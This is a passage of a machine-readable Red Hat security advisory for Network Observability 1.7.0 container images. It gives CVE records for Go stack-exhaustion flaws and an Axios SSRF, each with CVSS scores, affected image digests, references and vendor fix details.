"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-34158", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2024-09-06T21:20:12.126400+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310529", }, ], notes: [ { category: "description", text: "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34158", }, { category: "external", summary: "RHBZ#2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34158", url: "https://www.cve.org/CVERecord?id=CVE-2024-34158", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", }, { category: "external", summary: "https://go.dev/cl/611240", url: "https://go.dev/cl/611240", }, { category: "external", summary: "https://go.dev/issue/69141", url: "https://go.dev/issue/69141", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3107", url: "https://pkg.go.dev/vuln/GO-2024-3107", }, ], release_date: "2024-09-06T21:15:12.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-39338", cwe: { id: "CWE-918", name: "Server-Side Request Forgery (SSRF)", }, discovery_date: "2024-08-13T17:21:32.774718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2304369", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.", title: "Vulnerability description", }, { category: "summary", text: "axios: axios: Server-Side Request Forgery", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", 